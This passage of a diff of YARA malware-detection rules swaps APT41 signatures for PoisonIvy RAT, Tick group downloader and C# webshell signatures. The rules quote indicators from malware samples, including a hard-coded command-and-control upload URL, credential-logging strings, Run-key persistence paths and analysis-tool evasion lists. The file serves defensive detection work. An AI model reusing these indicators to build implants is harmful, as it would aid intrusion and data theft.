-		logic_hash = "b74b89ac382b2b839c169cd1388d86888172f133091afd079ec42c9380935fdc"
-		score = 80
+		hash = "b874b76ff7b281c8baa80e4a71fc9be514093c70"
+		logic_hash = "938df757d1f5ee1028d61dbc2ab76a33c788a44f87cb0d84626420e20bfb5fa4"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii
-		$s2 = "tcpview.exe" fullword ascii
-		$s3 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" fullword ascii
-		$s4 = "AxEeulaVteSgeR" fullword ascii
-		$s5 = "%04d-%02d-%02d_%02d-%02d-%02d.dmp" fullword ascii
+		$s0 = "pidll.dll" fullword ascii
+		$s1 = "sens32.dll" fullword wide
+		$s3 = "FileDescription" fullword wide
+		$s4 = "OriginalFilename" fullword wide
+		$s5 = "ZwSetInformationProcess" fullword ascii
+		$s9 = "Microsoft Media Device Service Provider" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG_SHADOW : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_APT_2 : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG SHADOW"
+		description = "Detects a PoisonIvy Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "4d64ccd2-add8-5749-8178-f2c5336e1495"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L33-L44"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L24-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fc923c7e85f3870e08a077b344e575d3c349fa02f3d218a9a7ec31992f14866b"
-		score = 85
-		quality = 85
+		hash = "333f956bf3d5fc9b32183e8939d135bc0fcc5770"
+		logic_hash = "58d62278d776c9f7c3ae0815aa4b248f85c5fc648405b8d1ba2b8eb2847e1e88"
+		score = 70
+		quality = 83
 		tags = "FILE"
-		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "pidll.dll" fullword ascii
+		$s1 = "sens32.dll" fullword wide
+		$s2 = "9.0.1.56" fullword wide
+		$s3 = "FileDescription" fullword wide
+		$s4 = "OriginalFilename" fullword wide
+		$s5 = "ZwSetInformationProcess" fullword ascii
+		$s6 = "\"%=%14=" fullword ascii
+		$s7 = "091A1G1R1_1g1u1z1" fullword ascii
+		$s8 = "gHsMZz" fullword ascii
+		$s9 = "Microsoft Media Device Service Provider" fullword wide
+		$s10 = "Copyright (C) Microsoft Corp." fullword wide
+		$s11 = "MFC42.DLL" fullword ascii
+		$s12 = "MSVCRT.dll" fullword ascii
+		$s13 = "SpecialBuild" fullword wide
+		$s14 = "PrivateBuild" fullword wide
+		$s15 = "Comments" fullword wide
+		$s16 = "040904b0" fullword wide
+		$s17 = "LegalTrademarks" fullword wide
+		$s18 = "CreateThread" fullword ascii
+		$s19 = "ntdll.dll" fullword ascii
+		$s20 = "_adjust_fdiv" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and pe.imphash ( ) == "c67de089f2009b21715744762fc484e8"
+		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_CRACKSHOT : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_APT_3 : FILE
 {
 	meta:
-		description = "Detects APT41 malware CRACKSHOT"
+		description = "Detects a PoisonIvy Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ec34a77-dc7f-5f27-9f0a-c98438389018"
-		date = "2019-08-07"
+		id = "e2e0bf75-7704-585f-b2b3-727d14946c76"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L46-L64"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L60-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "70dd9edfc7f9ace7b00a35eb2ef664aa4fbaab8e2d268922d1593074897e769c"
-		score = 85
+		hash = "df3e1668ac20edecc12f2c1a873667ea1a6c3d6a"
+		logic_hash = "96f8324dcf85f5baa64178774abf17516a9e023dd6fa38e2bce0fe5159a4f704"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ";procmon64.exe;netmon.exe;tcpview.exe;MiniSniffer.exe;smsniff.exe" ascii
-		$s1 = "RunUrlBinInMem" fullword ascii
-		$s2 = "DownRunUrlFile" fullword ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36" fullword ascii
-		$s4 = "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s" fullword ascii
+		$s0 = "\\notepad.exe" ascii
+		$s1 = "\\RasAuto.dll" ascii
+		$s3 = "winlogon.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG_2 : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_APT_4 : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG"
+		description = "Detects a PoisonIvy Sample APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "02bf546b-99a2-5ffb-8ee7-7bb005ef953b"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L66-L82"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L79-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2ec2e91edaaf976169b1fa6645aeae75135e5d5f522e0fda2438f84d674f383"
+		hash = "558f0f0b728b6da537e2666fbf32f3c9c7bd4c0c"
+		logic_hash = "7ba10269d31e985dff582ae4103ef1179172ae475e078161864f185380bb5035"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ma_lockdown_service.dll" fullword wide
-		$s2 = "acbde.dll" fullword ascii
-		$s3 = "MA lockdown Service" fullword wide
-		$s4 = "McAfee Agent" fullword wide
+		$s0 = "Microsoft Software installation Service" fullword wide
+		$s1 = "idll.dll" fullword ascii
+		$s2 = "mgmts.dll" fullword wide
+		$s3 = "Microsoft(R) Windows(R)" fullword wide
+		$s4 = "ServiceMain" fullword ascii
+		$s5 = "Software installation Service" fullword wide
+		$s6 = "SetServiceStatus" fullword ascii
+		$s7 = "OriginalFilename" fullword wide
+		$s8 = "ZwSetInformationProcess" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_5 : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG"
+		description = "Detects PoisonIvy RAT sample set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "61f7efd4-745a-5f06-a66d-b4b2a2ecc614"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L84-L106"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L103-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34459c2a8a13b8084c93a640723a3e2b67d2f695ff84ab63f4e313cacc458f32"
-		score = 80
+		hash = "545e261b3b00d116a1d69201ece8ca78d9704eb2"
+		logic_hash = "3f88b673b80b67a110915285a87ead265ad0176ea414426ba55e780e3aa396fe"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd"
-		hash2 = "5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90"
-		hash3 = "f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661"
-		hash4 = "3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "TSMSISrv.DLL" fullword wide
-		$s2 = "[-]write failed[%d]" fullword ascii
-		$s3 = "[-]load failed" fullword ascii
-		$s4 = "Remote Desktop Services" fullword wide
+		$s0 = "Microsoft Software installation Service" fullword wide
+		$s2 = "pidll.dll" fullword ascii
+		$s3 = "\\mspmsnsv.dll" ascii
+		$s4 = "\\sfc.exe" ascii
+		$s13 = "ServiceMain" fullword ascii
+		$s15 = "ZwSetInformationProcess" fullword ascii
+		$s17 = "LookupPrivilegeValueA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "1b074ef7a1c0888ef31337c8ad2f2e0a" or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_6 : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON"
+		description = "Detects PoisonIvy RAT sample set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6611fb04-7237-52d1-b29f-941c3853aeca"
-		date = "2019-08-07"
+		id = "f364fad0-3684-5500-b21b-396f1e259217"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L108-L135"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L126-L164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8afa91f90157c3ac0f7954cd2d42022392c4e6f039d88d1dd4bace19028c2b1"
-		score = 85
+		logic_hash = "0d77fd224b8d2dfd506faf0d3e359bf04172cc2854dc737e05c4bf99d0e1f3f7"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
-		hash2 = "4aa6970cac04ace4a930de67d4c18106cf4004ba66670cfcdaa77a4c4821a213"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c2630ab9b56c00fd748a631098fa4339f46d42b"
+		hash2 = "36b4cbc834b2f93a8856ff0e03b7a6897fb59bd3"
 
 	strings:
-		$x1 = "workdll64.dll" fullword ascii
-		$s1 = "\\Fonts\\Error.log" ascii
-		$s2 = "[%d/%d/%d/%d:%d:%d]" fullword ascii
-		$s3 = "work_end" fullword ascii
-		$s4 = "work_start" fullword ascii
-		$s5 = "\\svchost.exe" ascii
-		$s6 = "LoadAppInit_DLLs" fullword ascii
-		$s7 = "netsvcs" fullword ascii
-		$s8 = "HookAPIs ...PID %d " fullword ascii
-		$s9 = "SOFTWARE\\Microsoft\\HTMLHelp" fullword ascii
-		$s0 = "DllMain_mem" fullword ascii
-		$s10 = "%s\\NtKlRes.dat" fullword ascii
-		$s11 = "Global\\%s-%d" fullword ascii
+		$x1 = "124.133.252.150" fullword ascii
+		$x3 = "http://124.133.254.171/up/up.asp?id=%08x&pcname=%s" fullword ascii
+		$z1 = "\\temp\\si.txt" ascii
+		$z2 = "Daemon Dynamic Link Library" fullword wide
+		$z3 = "Microsoft Windows CTF Loader" fullword wide
+		$z4 = "\\tappmgmts.dll" ascii
+		$z5 = "\\appmgmts.dll" ascii
+		$s0 = "%USERPROFILE%\\AppData\\Local\\Temp\\Low\\ctfmon.log" fullword ascii
+		$s1 = "%USERPROFILE%\\AppData\\Local\\Temp\\ctfmon.tmp" fullword ascii
+		$s2 = "\\temp\\ctfmon.tmp" ascii
+		$s3 = "SOFTWARE\\Classes\\http\\shell\\open\\commandV" fullword ascii
+		$s4 = "CONNECT %s:%i HTTP/1.0" fullword ascii
+		$s5 = "start read histry key" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
+		$s7 = "[password]%s" fullword ascii
+		$s8 = "Daemon.dll" fullword ascii
+		$s9 = "[username]%s" fullword ascii
+		$s10 = "advpack" fullword ascii
+		$s11 = "%s%2.2X" fullword ascii
+		$s12 = "advAPI32" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 8 of ( $s* ) ) or ( 1 of ( $z* ) and 3 of ( $s* ) )
 }
-
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON_2 : FILE
+rule SIGNATURE_BASE_Poisonivy_Sample_7 : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON"
+		description = "Detects PoisonIvy RAT sample set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1e48d859-2da9-583e-80e5-8d59054cfb85"
-		date = "2019-08-07"
+		id = "01224053-d95e-5144-981b-76cd7e57e1c3"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L137-L157"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L166-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dc35b78df1631b1c9650de2bac625a7bc629225f36fe5e32fbff829cb77dc9ac"
-		score = 75
+		hash = "9480cf544beeeb63ffd07442233eb5c5f0cf03b3"
+		logic_hash = "28db3fb7fa5b5e60ad1d1cc2b6d3d9d30a1948491105439201574ca354eb8bd1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "H:\\RBDoor\\" ascii
-		$s1 = "PlusDll.dll" fullword ascii
-		$s2 = "ShutDownEvent.dll" fullword ascii
-		$s3 = "\\svchost.exe" ascii
+		$s0 = "Microsoft Software installation Service" fullword wide
+		$s2 = "pidll.dll" fullword ascii
+		$s10 = "ServiceMain" fullword ascii
+		$s11 = "ZwSetInformationProcess" fullword ascii
+		$s12 = "Software installation Service" fullword wide
+		$s13 = "Microsoft(R) Windows(R) Operating System" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or pe.exports ( "DllMain_mem" ) or $x1 or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN : FILE
+rule SIGNATURE_BASE_Poisonivy_RAT_Ssmuidll : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON.BIN"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c8bd62b4-b882-5c04-aace-76dd4a21a784"
-		date = "2019-08-07"
+		description = "Detects PoisonIvy RAT DLL mentioned in Palo Alto Blog in April 2016"
+		author = "Florian Roth (Nextron Systems) (with the help of yarGen and Binarly)"
+		id = "f2535b70-cf17-5435-9fc8-2dfdf70d95ac"
+		date = "2016-04-22"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L159-L180"
+		reference = "http://goo.gl/WiwtYT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L196-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c6557bff952454482271d1b52fb37b2dd0471abd237449fd9c94b293ea5218b3"
-		score = 90
+		logic_hash = "d048d88cac40f4fe3affee8d9dad35a7347a5459fbdd56b08a77ece4f6c2ac08"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994"
-		hash2 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
+		hash1 = "7a424ad3f3106b87e8e82c7125834d7d8af8730a2a97485a639928f66d5f6bf4"
+		hash2 = "6eb7657603edb2b75ed01c004d88087abe24df9527b272605b8517a423557fe6"
+		hash3 = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
+		hash4 = "8b805f508879ecdc9bba711cfbdd570740c4825b969c1b4db980c134ac8fef1c"
+		hash5 = "ac99d4197e41802ff9f8852577955950332947534d8e2a0e3b6c1dd1715490d4"
 
 	strings:
-		$s1 = "PlusDll.dll" fullword ascii
-		$s2 = "\\Device\\PORTLESS_DeviceName" wide
-		$s3 = "%s%s\\Security" fullword ascii
-		$s4 = "%s\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
-		$s5 = "%s%s\\Enum" fullword ascii
+		$s1 = "ssMUIDLL.dll" fullword ascii
+		$op1 = { 6a 00 c6 07 e9 ff d6 }
+		$op2 = { 02 cb 6a 00 88 0f ff d6 47 ff 4d fc 75 }
+		$op3 = { 6a 00 88 7f 02 ff d6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( all of ( $op* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN_2 : FILE
+
+rule SIGNATURE_BASE_APT_Tick_Sysmon_Loader_Jun18 : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON.BIN"
+		description = "Detects Sysmon Loader from Tick group incident - Weaponized USB"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37d6a44d-7811-5e87-84e2-b2a8b3da3124"
-		date = "2019-08-07"
+		id = "eae013c3-4774-5342-bd1a-5f2825612747"
+		date = "2018-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L182-L200"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tick_weaponized_usb.yar#L13-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1e3d622b4719962f59d95dbf1374c526c22461dd1d9313504f28e8e5c9184272"
-		score = 85
+		logic_hash = "e6256269409322a4f48bfdaafc52f5ec83602cf66f2e3b8d83ed5175e1dc506f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
-		hash2 = "c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "31aea8630d5d2fcbb37a8e72fe4e096d0f2d8f05e03234645c69d7e8b59bb0e8"
 
 	strings:
-		$x1 = "\\Double\\Door_wh\\" ascii
-		$x2 = "[Stone] Config --> 2k3 TCP Positive Logout." fullword ascii
-		$x3 = "\\RbDoorX64.pdb" ascii
-		$x4 = "RbDoor, Version 1.0" fullword wide
-		$x5 = "About RbDoor" fullword wide
+		$x1 = "SysMonitor_3A2DCB47" fullword ascii
+		$s1 = "msxml.exe" fullword ascii
+		$s2 = "wins.log" fullword ascii
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
+		$s4 = "%2d-%2d-%2d-%2d" fullword ascii
+		$s5 = "%USERPROFILE%" fullword ascii
+		$s6 = "Windows NT" fullword ascii
+		$s7 = "device monitor" fullword ascii
+		$s8 = "\\Accessories" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "c5bb16e79fb500c430edce9481ae5b2b" or $x1 or 6 of them )
 }
-
-rule SIGNATURE_BASE_APT_APT41_Revokedcert_Aug19_1 : FILE
+rule SIGNATURE_BASE_APT_Tick_Homamdownloader_Jun18 : FILE
 {
 	meta:
-		description = "Detects revoked certificates used by APT41 group"
+		description = "Detects HomamDownloader from Tick group incident - Weaponized USB"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f107cc42-58ec-500d-b1c3-27e9e00826aa"
-		date = "2019-08-07"
+		id = "8ec52cb7-41a4-50a9-9cb1-23bee354680f"
+		date = "2018-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L202-L231"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tick_weaponized_usb.yar#L40-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f78c1310f99ac1993b01f3469f2f8e0765b79b2ea17fc6e7cff4e99949ca1139"
-		score = 60
+		logic_hash = "b4c798aa0c71f44f271e710d791c97adcbf9bd28ec87dd1d8d589029e58d1cfb"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f817c9826089b49d251b8a09a0e9bf9b4b468c6e2586af60e50afe48602f0bec"
+
+	strings:
+		$s1 = "cmd /c hostname >>" fullword ascii
+		$s2 = "Mstray.exe" fullword ascii
+		$s3 = "msupdata.exe" fullword ascii
+		$s5 = "Windows\\CurrentVersion\\run" fullword ascii
+		$s6 = "Content-Type: */*" fullword ascii
+		$s11 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" or pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" or pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:73:85:f7:02" or pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" or pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" or pe.signatures [ i ] . serial == "53:0c:e1:4c:81:f3:62:10:a1:68:2a:ff:17:9e:25:80" or pe.signatures [ i ] . serial == "54:c6:c1:40:6f:b4:ac:b5:d2:06:74:e9:93:92:c6:3e" or pe.signatures [ i ] . serial == "fd:f2:83:7d:ac:12:b7:bb:30:ad:05:8f:99:9e:cf:00" or pe.signatures [ i ] . serial == "18:63:79:57:5a:31:46:e2:6b:ef:c9:0a:58:0d:1b:d2" or pe.signatures [ i ] . serial == "5c:2f:97:a3:1a:bc:32:b0:8c:ac:01:00:59:8f:32:f6" or pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" or pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" or pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" or pe.signatures [ i ] . serial == "30:d3:c1:67:26:5b:52:0c:b8:7f:25:84:4f:95:cb:04" or pe.signatures [ i ] . serial == "1e:52:bb:f5:c9:0e:c1:64:d0:5b:e0:e4:16:61:52:5f" or pe.signatures [ i ] . serial == "25:f8:78:22:de:56:d3:98:21:59:28:73:ea:09:ca:37" or pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 3 of them
 }
-rule SIGNATURE_BASE_APT_APT41_CN_ELF_Speculoos_Backdoor : FILE
+rule SIGNATURE_BASE_WEBSHELL_Csharp_Hash_String_Oct22 : FILE
 {
 	meta:
-		description = "Detects Speculoos Backdoor used by APT41"
-		author = "Florian Roth (Nextron Systems)"
-		id = "efe2b368-33af-5382-a5f0-0e7dd7f4dea4"
-		date = "2020-04-14"
+		description = "C# webshell using specific hash check for the password."
+		author = "Nils Kuhnert (modified by Florian Roth)"
+		id = "c7d459be-5e61-57b7-b738-051c0cec62d2"
+		date = "2022-10-27"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L233-L267"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshell_csharp.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee4cbbc5fc51fb24cbf6017dfb4763ac72a0b23a3b6e794b909e678ebfbabc03"
-		score = 90
+		hash = "29c187ad46d3059dc25d5f0958e0e8789fb2a51b9daaf90ea27f001b1a9a603c"
+		logic_hash = "28a07f3dd17fc469388867fa82a0e21abeee9c4e114af245b684535e4e194891"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167"
-		hash2 = "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28"
